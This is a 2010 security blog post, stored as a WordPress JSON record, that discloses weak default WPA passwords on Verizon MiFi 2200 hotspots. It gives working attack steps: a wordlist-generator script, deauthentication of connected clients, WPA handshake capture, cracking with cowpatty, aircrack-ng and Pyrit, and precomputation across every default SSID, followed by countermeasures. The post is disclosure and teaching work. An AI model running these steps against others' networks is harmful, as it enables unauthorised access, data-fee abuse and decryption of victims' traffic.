{"id":417,"date":"2010-02-02T21:34:06","date_gmt":"2010-02-03T02:34:06","guid":{"rendered":"http:\/\/www.willhackforsushi.com\/?p=417"},"modified":"2010-02-03T11:31:34","modified_gmt":"2010-02-03T16:31:34","slug":"verizon-mifi-pwned-maybe-they-should-take-my-class","status":"publish","type":"post","link":"https:\/\/www.willhackforsushi.com\/?p=417","title":{"rendered":"Verizon MiFi Pwned (maybe they should take my class)"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" title=\"Left Arrow\" src=\"http:\/\/www.willhackforsushi.com\/images\/larrow.png\" alt=\"\" width=\"400\" height=\"37\" \/><br \/>\n<strong>Update<\/strong>: Please also see my <a href=\"http:\/\/www.willhackforsushi.com\/?p=458\">post about the hidden page for advanced MiFi configuration settings<\/a>.<\/p>\n<p>Recently, I picked up a Verizon MiFi device for $50 and the extension of my service contract for another 2 years.  The fun that I&#8217;ve had with the device so far has well made up for both costs.<\/p>\n<h2>Background<\/h2>\n<div style=\"width: 215px\" class=\"wp-caption alignleft\"><a href=\"http:\/\/www.willhackforsushi.com\/images\/verizon-mifi-2200.jpg\"><img loading=\"lazy\" decoding=\"async\" title=\"Verizon MiFi 2200 - A Marvel of Engineering\" src=\"http:\/\/www.willhackforsushi.com\/images\/verizon-mifi-2200.jpg\" alt=\"Verizon MiFi 2200\" width=\"205\" height=\"132\" \/><\/a><p class=\"wp-caption-text\">Verizon MiFi 2200 - A Marvel of Engineering<\/p><\/div>\n<p>The MiFi is a battery-powered 802.11b\/g AP slightly smaller than an iPhone that features an integrated EV-DO uplink.  This device replaced my former USB EV-DO WAN card*, allowing me to share the EV-DO connectivity with multiple devices over WiFi.  It&#8217;s been immensely useful since I commonly travel with 3 laptops, not to mention additional mobile devices.<\/p>\n<p>From a security perspective, the MiFi device uses a unique WPA pre-shared key (PSK) for authentication with the TKIP cipher for encryption.  It&#8217;s unclear why the device doesn&#8217;t use WPA2-PSK authentication with the AES-CCMP cipher; perhaps it was a security trade-off by the manufacturer to maintain the greatest possibility compatibility with legacy devices that only support WPA-PSK\/TKIP.<\/p>\n<div style=\"width: 209px\" class=\"wp-caption alignright\"><a href=\"http:\/\/www.willhackforsushi.com\/images\/mifi-label.jpg\"><img loading=\"lazy\" decoding=\"async\" title=\"Verizon MiFi Label\" src=\"http:\/\/www.willhackforsushi.com\/images\/mifi-label.jpg\" alt=\"Verizon MiFi Label\" width=\"199\" height=\"101\" \/><\/a><p class=\"wp-caption-text\">Verizon - We Never Miss an Opportunity to Market<\/p><\/div>\n<p>On the reverse side of the MiFi is a label, identifying the default SSID and PSK used for authentication.  Besides the obvious marketing angle Verizon gets from including its name in the SSID, this allows the user to quickly identify and connect to their personal WiFi network to leverage the EV-DO uplink.<\/p>\n<h2>Reconnaissance<\/h2>\n<p>Like any good hacker, I turn to the tools that I know to be tried and true.  <a href=\"http:\/\/www.kismetwireless.net\/\" target=\"_blank\">Kismet<\/a> is a powerful assessment and evaluation tool for wireless networks, providing additional insight into the MiFi wireless LAN interface.<\/p>\n<div style=\"width: 507px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.willhackforsushi.com\/images\/mifi-kismet.png\"><img loading=\"lazy\" decoding=\"async\" title=\"Kismet Detail\" src=\"http:\/\/www.willhackforsushi.com\/images\/mifi-kismet.png\" alt=\"Kismet Detail\" width=\"497\" height=\"360\" \/><\/a><p class=\"wp-caption-text\">Kismet - It&#39;s Like Fate, or Something<\/p><\/div>\n<p>Cursory analysis of the beacon information elements don&#8217;t reveal anything particularly interesting, though the Kismet screen-shot gives us a point of correlation.  The MiFi SSID on my product is &#8220;Verizon MiFi DAD1 Secure&#8221;, slightly different than that of the MiFi device label (where Kismet reports the addition of &#8221; Secure&#8221; to the SSID, and the mixed-case &#8220;MiFi&#8221;, which is important to us).<\/p>\n<p>Also, we can see that the &#8220;DAD1&#8221; in the SSID matches the last two bytes of the AP&#8217;s MAC address (or Basic Service Set Identifier &#8211; BSSID).  From this we can determine that Verizon has no more than 65,536 unique SSID&#8217;s for MiFi devices (potentially less; more data is needed to determine if all 16-bits of the BSSID are evenly distributed among devices).<\/p>\n<p>The password on the back of the MiFi device also reveals some interesting information.  From the photo above, the password on my MiFi device is:<\/p>\n<h3>\n<table border=\"0\" cellpadding=\"5\">\n<tbody>\n<tr>\n<td>09<\/td>\n<td>11<\/td>\n<td>19<\/td>\n<td style=\"text-align: center;\">00891<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong> <\/strong><\/h3>\n<p>This password value likely breaks down into four fields:<\/p>\n<ul>\n<li>Manufacture Year: &#8220;<strong>09<\/strong>&#8221; represents the 2-character year of manufacture.<\/li>\n<li>Manufacture Month: &#8220;<strong>11<\/strong>&#8221; represents the 2-character month code.<\/li>\n<li>Manufacture Day?: &#8220;<strong>19<\/strong>&#8221; represents the 2-character day code (NB: This could be wrong, one sample had a value of &#8220;34&#8221; here, need more data).<\/li>\n<li>Sequential Identifier: &#8220;<strong>00891<\/strong>&#8221; represents the 5-character sequential identifier code.<\/li>\n<\/ul>\n<p>Based on this assessment, we can determine that the password selection for the MiFi default is weak.  Instead of 11 numeric values with an effective entropy of approximately 36 bits, the MiFi password only has an effective entropy of <strong>less than 17 bits<\/strong> for a given 6-byte prefix.  If the concept of a manufacture date-stamp is true for the 6-byte prefix, then we have a relatively small search space to find the default MiFi PSK.<\/p>\n<h2>Exploitation<\/h2>\n<p>Knowing that for a given 6-byte password prefix there are only 100,000 possible passwords, we can get down to exploiting a given MiFi device.  We don&#8217;t know how many 6-byte prefixes are in use, but that&#8217;s where YOU THE READER come in.  Please <a href=\"http:\/\/www.willhackforsushi.com\/?page_id=87\">let me know<\/a> what prefixes you see on your individual devices, and I&#8217;ll add them to the attack set.<\/p>\n<p>Talking amongst my wonderful colleagues at <a href=\"http:\/\/www.inguardians.com\" target=\"_blank\">InGuardians<\/a>, I was able to identify 4 unique manufacture prefixes.  Assuming the target device is one of these values, we can quickly build a dictionary to attack the PSK selection with a small Python script and a tool such as coWPAtty or Aircrack-ng:<\/p>\n<pre lang=\"python\">#!\/usr\/bin\/env python\r\nimport sys\r\n\r\n# remove executable name\r\nsys.argv.pop(0)\r\nif len(sys.argv) == 0:\r\n\tprint \"Must specify the 6-digit manufacture date (e.g. \\\"091119\\\").\"\r\n\tsys.exit(1)\r\nfor arg in sys.argv:\r\n\tfor i in xrange(0,100000):\r\n\t\tprint \"%s%05d\"%(arg, i)<\/pre>\n<p>You can download this source as <a href=\"http:\/\/www.willhackforsushi.com\/code\/mifi-passgen.py\">mifi-passgen.py<\/a>.  Running this script and redirecting it to a file (e.g. &#8220;.\/mifi-passgen.py 091118 091119 091120 091121 &gt;mifi-wordlist.txt&#8221;) allows us to pass it to your favorite WPA cracking tool.<\/p>\n<p>Once the wordlist is ready, we need to capture the WPA handshake for a given client.  This is straightforward with Kismet, or a tool like Airodump-ng.  In this example, I&#8217;ll use Airodump-ng and Aireplay-ng to fake a deauthenticate message, forcing the victim to disconnect and reconnect to the MiFi AP (because I&#8217;m an impatient attacker).  First, I&#8217;ll start Airodump-ng:<\/p>\n<pre lang=\"bash\">root@bt:~# airmon-ng start wlan0 11\r\n\r\nInterface       Chipset         Driver\r\n\r\nwlan0           Atheros         ath5k - [phy0]\r\n                                (monitor mode enabled on mon0)\r\nwlan0mon        Atheros         ath5k - [phy0]\r\n\r\nroot@bt:~# airodump-ng --bssid 00:21:E8:B2:DA:D1 -w mifi-dad1 --channel 11 wlan0mon<\/pre>\n<p>Next, Aireplay-ng is used to deauthenticate a user.  I send 5 deauth messages, just to make sure the target receives at least one:<\/p>\n<pre lang=\"bash\">root@bt:~# aireplay-ng --deauth 5 -a 00:21:E8:B2:DA:D1 wlan0mon\r\n16:53:14  Waiting for beacon frame (BSSID: 00:21:E8:B2:DA:D1) on channel 11\r\nNB: this attack is more effective when targeting\r\na connected wireless client (-c ).\r\n16:53:14  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]\r\n16:53:14  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]\r\n16:53:15  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]\r\n16:53:15  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]\r\n16:53:16  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]<\/pre>\n<p>Returning to the Airodump-ng window, we can see that it has observed a WPA handshake, identifying the MAC address of the MiFi AP.  Terminate the Airodump-ng session by issuing &#8220;CTRL+C&#8221;.<\/p>\n<div style=\"width: 560px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.willhackforsushi.com\/images\/mifi-airodump.png\"><img loading=\"lazy\" decoding=\"async\" title=\"Airodump-ng WPA Handshake\" src=\"http:\/\/www.willhackforsushi.com\/images\/mifi-airodump.png\" alt=\"Airodump-ng WPA Handshake\" width=\"550\" height=\"212\" \/><\/a><p class=\"wp-caption-text\">WPA Handshake - No Limp Fish<\/p><\/div>\n<p>With the Airodump-ng packet capture file mifi-dad1-01.cap, and the dictionary file containing the potential passwords for the target MiFi device, we can implement the WPA\/WPA2 brute-force dictionary attack using <a href=\"http:\/\/www.willhackforsushi.com\/?page_id=50\">coWPAtty<\/a>:<\/p>\n<pre lang=\"bash\">root@bt:~# cowpatty -r mifi-dad1-01.cap -f mifi-wordlist.txt -s \"Verizon MiFi2200 DAD1 Secure\"\r\ncowpatty 4.6 - WPA-PSK dictionary attack. \r\n\r\nCollected all necessary data to mount crack against WPA\/PSK passphrase.\r\nStarting dictionary attack.  Please be patient.\r\n\r\nThe PSK is \"09111900891\".\r\n\r\n892 passphrases tested in 4.60 seconds:  193.97 passphrases\/second<\/pre>\n<p>&#8230; or <a href=\"http:\/\/www.aircrack-ng.org\" target=\"_blank\">Aircrack-ng<\/a>.<\/p>\n<pre lang=\"bash\">root@bt:~# aircrack-ng mifi-dad1-01.cap -w mifi-wordlist.txt<\/pre>\n<div style=\"width: 560px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.willhackforsushi.com\/images\/mifi-aircrack.png\"><img loading=\"lazy\" decoding=\"async\" title=\"Aircrack-ng Password Recovery\" src=\"http:\/\/www.willhackforsushi.com\/images\/mifi-aircrack.png\" alt=\"Aircrack-ng Password Recovery\" width=\"550\" height=\"358\" \/><\/a><p class=\"wp-caption-text\">Key Found, Conveniently Enough<\/p><\/div>\n<p>This is fun and evil and all, but we can get even more evil, can&#8217;t we?<\/p>\n<h2>Exploitation (with 100% more Evil)<\/h2>\n<p>We know that WPA\/WPA2-PSK networks are vulnerable to offline dictionary attacks, despite the efforts of the IEEE 802.11 committee to thwart the attack by reducing the speed of password guessing.  Manipulating this mechanism, tools such as coWPAtty&#8217;s &#8220;genpmk&#8221; and Aircrack-ng&#8217;s &#8220;Airolib-ng&#8221; spend up-front time precomputing all the possible key guesses in a dictionary file, accelerating the cracking time when the attack is implemented.  A limiting factor in this precomputation attack is that all the password guesses need to be computed for each unique SSID.<\/p>\n<p>Recall that the MiFi SSID is in the form &#8220;Verizon MiFi2200 ???? Secure&#8221;, where the SSID is the same for each device with the exception of the 4 ASCII characters representing last 2 bytes of the wireless BSSID.  With only 2 bytes difference between each SSID, there is a limit of 65,536 potential SSID&#8217;s.<\/p>\n<p>Using the WPA\/WPA2-PSK precomputation attack, we can precompute the password guesses based on the manufacture date and sequential identifier for each of the 65K SSID&#8217;s.  Once this is precomputed, it becomes possible to recover the password for any default MiFi configuration in a matter of seconds.<\/p>\n<p>Leveraging standard host CPU&#8217;s, it might take a long time to precompute all the password guesses for each of the 65K SSID&#8217;s.  Fortunately, we aren&#8217;t constrained to the speed of common CPU&#8217;s.<\/p>\n<p>While coWPAtty and Aircrack-ng made strides in improving the speed of attacking WPA\/WPA2-PSK networks, they pale in comparison to the excellent work of <a href=\"http:\/\/code.google.com\/p\/pyrit\/\" target=\"_blank\">Lukas Lueg and the Pyrit project<\/a>.  Pyrit leverages both the performance of standard CPU&#8217;s for precomputing password guesses for PSK networks, as well as the impressive computing power of video accelerators, including the Nvidia CUDA line.<\/p>\n<p>If we assume there are 12 manufacture date prefixes, we are left with a password list of 1.2 million entries.  Computing all the possible password hashes for each of the 65K SSID&#8217;s on a Core2Duo 2.5 GHz SSE2 would take almost two years to complete.  Leveraging 4 GeForce 295 CUDA cards on a single host would require only 10.2 days.<\/p>\n<p>With the database capabilities added to Pyrit, we can get this attack setup fairly easily.  <a href=\"http:\/\/code.google.com\/p\/pyrit\/wiki\/Installation\" target=\"_blank\">After installing Pyrit<\/a> (getting the source from SVN and installing sqlalchemy <a href=\"http:\/\/pyrit.wordpress.com\/2009\/10\/18\/network-is-coming-back\/\" target=\"_blank\">described here<\/a>), we need to configure Pyrit to use a database for storage.  I&#8217;m using sqlite in this example by editing the ~\/.pyrit\/config file as shown:<\/p>\n<pre lang=\"bash\">#default_storage = file:\/\/\r\n# Change this path to an appropriate one for your filesystem\r\ndefault_storage = sqlite:\/\/\/\/Users\/josh\/hack\/MiFi-PSK\/mifi-psk.db\r\nrpc_announce = true\r\nrpc_announce_broadcast = false\r\nrpc_knownclients =\r\nrpc_server = true<\/pre>\n<p>Once the sqlite database storage reference is set, we can create all 65K MiFi SSID&#8217;s using a simple Python script:<\/p>\n<pre lang=\"python\">#!\/usr\/bin\/env python\r\nimport cpyrit.storage\r\n\r\nstore = cpyrit.storage.getStorage('sqlite:\/\/\/mifi-psk.db')\r\nfor i in xrange(0,256):\r\n\tfor j in xrange(0,256):\r\n\t\tessid = \"Verizon MiFi2200 %02X%02X Secure\"%(i,j)\r\n\t\tstore.essids.create_essid(essid)\r\n\t\tprint \"Created %s\"%essid<\/pre>\n<p>You can download this source as <a href=\"http:\/\/www.willhackforsushi.com\/code\/pyrit-mifi-ssids.py\">pyrit-mifi-ssids.py<\/a>.  Change to the directory path you established in the Pyrit config file, then create the SSID&#8217;s for Pyrit:<\/p>\n<pre lang=\"bash\">$ cd \/Users\/josh\/hack\/MiFi-PSK\r\n$ .\/pyrit-mifi-ssids.py\r\nCreated Verizon MiFi2200 0000 Secure\r\nCreated Verizon MiFi2200 0001 Secure\r\nCreated Verizon MiFi2200 0002 Secure\r\nCreated Verizon MiFi2200 0003 Secure\r\n...\r\nCreated Verizon MiFi2200 FFFF Secure<\/pre>\n<p>Once the SSID&#8217;s have been loaded, we can load the passwords into the Pyrit database as well.  Returning to the <a href=\"http:\/\/www.willhackforsushi.com\/code\/mifi-passgen.py\">mifi-passgen.py<\/a> script, we can pipe the output directly to Pyrit, as shown.<\/p>\n<pre lang=\"bash\">$ .\/mifi-passgen.py 091118 091119 091120 091121 | pyrit -i - import_passwords\r\nPyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http:\/\/pyrit.googlecode.com\r\nThis code is distributed under the GNU General Public License v3+\r\n\r\nConnecting to storage at 'sqlite:\/\/\/\/Users\/josh\/hack\/MiFi-PSK\/mifi-psk.db'...  connected.\r\n\r\n400000 lines read. Flushing buffers.... ...\r\nAll done.<\/pre>\n<p>Next, we allow Pyrit to precompute the passphase guesses for us, leveraging the available CPU and offload capabilities:<\/p>\n<pre lang=\"bash\">$ pyrit batch\r\nPyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http:\/\/pyrit.googlecode.com\r\nThis code is distributed under the GNU General Public License v3+\r\n\r\nConnecting to storage at 'sqlite:\/\/\/\/Users\/josh\/hack\/MiFi-PSK\/mifi-psk.db'...  connected.\r\n\r\nWorking on ESSID 'Verizon MiFi2200 4109 Secure'\r\nProcessed 2\/256 workunits so far (0.8%); 480 PMKs per second.\r\n...<\/pre>\n<p>The great part is that this only needs to be done once.  It could take days or weeks depending on your available hardware, but once it is complete, it can be used by anyone to recover the default password on any MiFi device.<\/p>\n<p>To leverage the Pyrit database, we can use the &#8220;attack_db&#8221; option with our packet capture, as shown.<\/p>\n<pre lang=\"bash\">$ pyrit -r mifi-dad1-01.cap attack_db\r\nPyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http:\/\/pyrit.googlecode.com\r\nThis code is distributed under the GNU General Public License v3+\r\n\r\nConnecting to storage at 'sqlite:\/\/\/\/Users\/josh\/hack\/Mifi-PSK\/mifi-psk.db'...  connected.\r\n\r\nParsing file 'mifi-dad1-01.cap' (1\/1)...\r\n8816 packets (8816 802.11-packets), 1 APs\r\n\r\nPicked AccessPoint 00:21:e8:b2:da:d1 ('Verizon MiFi2200 DAD1 Secure') automatically.\r\nAttacking handshake with Station 00:1c:b3:b8:76:6c...\r\nTried 57504 PMKs so far (57.4%); 107722 PMKs per second..\r\n\r\nThe password is '09111900891'.<\/pre>\n<h2>Impact<\/h2>\n<p>Using this technique, an attacker can recover the default password from any MiFi device.  The impact of this attack can vary, but three immediate concerns come to mind:<\/p>\n<ul>\n<li><strong>Utilization Fees<\/strong>: Verizon limits users to 5 GB data transfer a month over EV-DO account; exceeding this  watermark racks up significant fees for the end-user.  A neer-do-well could compromise a MiFi device and leverage it for their download purposes, potentially avoiding racking up their own Internet use charges, or just to cause trouble for the victim.<\/li>\n<li><strong>Client Attack<\/strong>: For organizations deploying MiFi devices for their road-warriors, an attacker may compromise the PSK on the MiFi wireless interface for the opportunity to exploit the client devices using the network interface.  This may be in an effort to gain access to a system over a weak network interface, allowing them to return to their more secure network to attack other internal hosts.<\/li>\n<li><strong>Traffic Decryption<\/strong>: If an attacker can identify the correct PSK for the MiFi network, then they can also decrypt all the traffic on the network with <a href=\"http:\/\/www.wireshark.org\" target=\"_blank\">Wireshark<\/a> or <a href=\"http:\/\/www.aircrack-ng.org\/doku.php?id=airdecap-ng\" target=\"_blank\">Airdecap-ng<\/a>.\u00a0 This could be used to passively collect sensitive information, or to actively exploit the client browser or other network traffic.<\/li>\n<\/ul>\n<h2>Countermeasures<\/h2>\n<p>Fortunately, there are a couple of options available to us to mitigate this attack.<\/p>\n<ul>\n<li><strong>Change the Default PSK<\/strong>: Before deploying the MiFi device, be sure to change the PSK to a non-default value.  The IEEE 802.11-2007 specification reads &#8220;A key generated from a passphrase of less than about 20 characters is unlikely to deter attacks.&#8221;; I think this is good advice.<\/li>\n<li><strong>Change the Default SSID<\/strong>: Change the default SSID from &#8220;Verizon MiFi2200 XXXX Secure&#8221; to another value that is not common, but not unique either (somewhere in the middle) to mitigate precomputed PSK attacks, as well as general wireless anonymity attacks.<\/li>\n<\/ul>\n<p>Enteprise organizations and end-users alike should apply both these recommendations to thwart attacks against the MiFi deficiency in password selection, as well as weaknesses in WPA\/WPA2-PSK in general.<\/p>\n<h2>Conclusion<\/h2>\n<p>The Verizon MiFi is a great tool, but the engineering team who created the default password mechanism should have taken into consideration the limited entropy in the selection of passwords, and the well-publicized attacks against WPA-PSK networks to limit customer exposure.  Coincidentally, this is a topic we examine in my <a href=\"http:\/\/www.sans.org\/sans-2010\/description.php?tid=2397\" target=\"_blank\">SANS Institute Ethical Hacking Wireless course<\/a>, where we dig into a variety of wireless systems including WiFi, Bluetooth, WiMAX, GSM, proprietary protocols and more.  If you are interested in wireless security topics, I recommend you check out the <a href=\"https:\/\/portal.sans.org\/ondemand\/getdemo.php?mid=3\" target=\"_blank\">course sample<\/a> or sign right up for the <a href=\"http:\/\/www.sans.org\/sans-2010\/?utm_campaign=SANS_2010\" target=\"_blank\">biggest SANS conference<\/a> of the year in Orlando, FL, March 8th &#8211; 13th.<\/p>\n<p>Questions, comments, concerns?  Please drop me a note.  Special thanks to <a href=\"http:\/\/code.google.com\/p\/pyrit\/\" target=\"_blank\">Lukas Lueg<\/a>, <a href=\"http:\/\/www.john-strand.com\/john-strand\/Welcome.html\" target=\"_blank\">John Strand<\/a> and my fellow agents at <a href=\"http:\/\/www.inguardians.com\" target=\"_blank\">InGuardians<\/a>.  Thanks guys!<\/p>\n<p>-Josh<\/p>\n<p>* On an hourly basis, this is the message my last Verizon USB EV-DO card gave me. The screen-shot says it all.<\/p>\n<div style=\"width: 210px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.willhackforsushi.com\/images\/verizon-stop-working.jpg\"><img loading=\"lazy\" decoding=\"async\" title=\"Verizon - Stopped Working For Me\" src=\"http:\/\/www.willhackforsushi.com\/images\/verizon-stop-working.jpg\" alt=\"Verizon - Stopped Working For Me\" width=\"200\" height=\"126\" \/><\/a><p class=\"wp-caption-text\">Verizon - Stopped Working For Me<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Update: Please also see my post about the hidden page for advanced MiFi configuration settings. Recently, I picked up a Verizon MiFi device for $50 and the extension of my service contract for another 2 years. The fun that I&#8217;ve &hellip; <a href=\"https:\/\/www.willhackforsushi.com\/?p=417\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,3],"tags":[],"class_list":["post-417","post","type-post","status-publish","format-standard","hentry","category-4","category-wireless"],"_links":{"self":[{"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=\/wp\/v2\/posts\/417","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=417"}],"version-history":[{"count":41,"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=\/wp\/v2\/posts\/417\/revisions"}],"predecessor-version":[{"id":453,"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=\/wp\/v2\/posts\/417\/revisions\/453"}],"wp:attachment":[{"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=417"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=417"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.willhackforsushi.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=417"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}